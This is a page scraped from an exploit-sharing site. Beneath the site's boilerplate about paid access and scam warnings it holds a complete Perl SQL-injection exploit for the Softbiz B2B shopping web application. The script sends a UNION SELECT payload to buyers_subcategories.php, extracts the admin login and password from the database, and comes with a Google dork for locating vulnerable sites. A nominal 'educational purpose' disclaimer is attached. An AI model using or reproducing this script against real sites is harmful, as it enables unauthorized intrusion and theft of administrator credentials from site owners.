0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Softbiz B2B shopping Sql Injection Exploit (perl)
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 #0 _ __ __ __ 1 #1 /' \ __ /'__`\ /\ \__ /'__`\ 0 #0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 #1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 #0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 #1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 #0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 #1 \ \____/ >> Exploit database separated by exploit 0 #0 \/___/ type (local, remote, DoS, etc.) 1 #1 1 #0 [+] Site : 1337day.com 0 #1 [+] Support e-mail : submit[at]1337day.com 1 #0 0 #1 ######################################### 1 #0 I'm Caddy-dz member from Inj3ct0r Team 1 #1 ######################################### 0 #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #### # Exploit Title: Softbiz B2B shopping sql injection Exploit (perl) # Author: Caddy-Dz # Facebook Page: http://www.facebook.com/Algerian.Cyber.Army # E-mail: islam_babia@hotmail.com # Category:: webapps # Google Dork: inurl:buyers_subcategories.php # Security Risk: High # Tested on: Windows Seven Edition Integral / French #### # # Greets : 1337day Team , Exploit-ID Team , Algerian Cyber Army Team , KedAns-Dz , Kalashincov3 # .. Kha&mix , King Of Pirates , xDZx-Team ... and all algerian hackers . # # this was written for educational purpose only. use it at your own risk. # author will be not responsible for any damage caused! user assumes all responsibility # intended for authorized web application pentesting only! use LWP::Simple; use LWP::UserAgent; system('cls'); system('title Softbiz B2B shopping sql injection'); system('color a'); if(@ARGV < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 site.com / \n"; print "[+] Note ! : do not use (http://) and make space between host and path like the exemple"; } print "\n****************************************************\n"; print "\n* coded by Caddy-Dz *\n"; print "\n* email: islam_babia[at]hotmail.co *\n"; print "\n* Fb Page: http://facebook.com/Algerian.Cyber.Army *\n"; print "\*****************************************************\n"; ($Target, $path,$file_vuln, $sql_query,) = @ARGV; my $file_vuln = "/buyers_subcategories.php?IndustryID=-56"; my $sql_query = '+union+select+1,2,concat(0x23,LoginID,0x3a,Password,0x23)+from+admin--'; my $url = "http://" . $Target . $path . $file_vuln . $sql_query; print "\n wait!!! \n\n"; my $request = HTTP::Request->new(GET=>$url); my $useragent = LWP::UserAgent->new(); $useragent->timeout(10); my $response = $useragent->request($request); if ($response->is_success) { my $res = $response->content; if ($res =~ m/[#](.*):(.*)[#]/g) { my ($username,$password) = ($1,$2); print "[+] $username:$password \n\n"; } else { print "[-] Error, Fail to get admin login.\n\n"; } } else { print "[-] Error, ".$response->status_line."\n\n"; } # 0day.today [2024-11-15] #